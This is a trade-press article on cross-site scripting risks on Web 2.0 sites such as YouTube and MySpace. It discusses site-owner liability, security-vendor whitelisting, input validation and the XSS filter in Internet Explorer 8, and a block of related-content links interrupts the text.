Stopping malware viruses from attacking Web 2.0 technology

The reason why Web 2.0 presents such a security risk has to do with a site's level of interactivity. Websites such as YouTube and MySpace allow users to upload files and post other types of content. Those files with malicious intent have been known to perform cross-site scripting (XSS) attacks.

This type of attack involves either uploading malicious files to a Web 2.0 site or embedded Java or Ajax scripts within text input fields. When other visitors to the site reach a page containing a malicious script or download malicious files from the site to their computers, their machines become infected.

Certainly, this is a major security threat, but let's move beyond the obvious. For starters, most security software treats well-known Web 2.0 sites as being completely safe. Of course the site itself is safe, but the content posted on the site by other users may not be. This means users may be exposed to malicious viruses on sites that have been classified as safe.

Another problem with the malicious use of otherwise benign websites is the legal ramifications. I don't think the legal issues have completely shaken themselves out yet, but there has been a lot of speculation lately that a website owner could potentially be held liable for the malicious use of his site, even if there is nothing malicious about the site itself. This speculation is based on the idea that a site owner could potentially be found to be negligent in his security practices, thereby allowing the exploit to happen.

Of course the legal issues work both ways. There are plenty of security companies that blacklist

Digg This!     StumbleUpon     Del.icio.us

RELATED CONTENT Security for the midmarket Locking down security in the move to electronic medical records A CIO's advice for implementing single sign-on solutions Options for outsourcing security grow, offer IT budget savings Network access control: Pointers for getting the knack of NAC Virtual servers no escape from IT security management concerns Unified communications: Securing access to OCS Unified communications security: How safe is it? Risk assessment frameworks easy to employ Midmarket regulatory compliance management: Don't let your guard down Single sign-on: Sensible security on scale Web 2.0 technology for the midmarket How has the role of the CIO changed? IRobot's CIO weighs in Preparing for the upturn, CIO sees IT budget increase for staff ITSM and corporate performance management: CIO Decisions Ezine Business software guides for the midmarket: CRM, ERP, Web 2.0 and more How collaboration tools bring cost savings, business alignment How to choose the right open source solution for your business Using Web 2.0 tools in your career search Midmarket IT budgets hit by economic downturn Optimizing business with Web 2.0 applications: How much do you know? CIO's cost-cutting measures include move to Gmail Information security management for the midmarket Using key risk indicators to sell your information security program IT security spending a bright spot in '09, with more growth predicted Gartner: Vetting security of third-party partners in five steps Locking down security in the move to electronic medical records Security and risk management in the midmarket Identity and access management planning guide for the midmarket Information systems management for the midmarket CIOs share advice on doing more with less Get smart about patching security vulnerabilities A CIO's advice for implementing single sign-on solutions

RELATED RESOURCES 2020software.com, trial software downloads for accounting software, ERP software, CRM software and business software systems Search Bitpipe.com for the latest white papers and business webcasts Whatis.com, the online computer dictionary

and whitelist websites based on whether or not those sites are safe. Such a company would face a tremendous backlash if it ever blacklisted a site such as MySpace or classified it as unsafe, but it might face legal action from users if such a site did happen to contain malicious content.

Ultimately, the only way to really address cross-site scripting attacks is for Web developers to bring security to the forefront of every design decision. Essentially, Web applications need to be coded so all user input is treated as "evil" until proven otherwise. This means Web developers must initially assume that all input is malicious, and then parse the input in a way that reliably separates the good input from the bad.

The problem with this is that not all Web developers can be trusted to protect users against malicious use of an otherwise legitimate site. Because you can never really tell for sure whether a site is being exploited by those with malicious intent, Microsoft is also taking steps to do something about cross-site scripting vulnerabilities. Internet Explorer 8 is slated to be the first version of the browser with a built-in cross-site scripting filter.

Although Internet Explorer 8 has been in beta testing for quite some time now, it remains to be seen how well Microsoft's new cross-site scripting filter will work when the browser is finally released. Microsoft is walking a fine line in that it must design the filter in a way that provides adequate protection, without breaking Web 2.0 applications or pestering users with constant nag screens.

Anytime a new technology emerges, there are certain unforeseen problems that initially come along with it, and the same goes for Web 2.0. I think that as browser security and Web application coding practices improve, though, cross-site scripting attacks will become less of a problem.

Brien M. Posey, MCSE, is a Microsoft Most Valuable Professional for his work with Windows 2000 Server and IIS. He has served as CIO for a nationwide chain of hospitals and was once in charge of IT security for Fort Knox. Write to him at editor@searchcio-midmarket.com.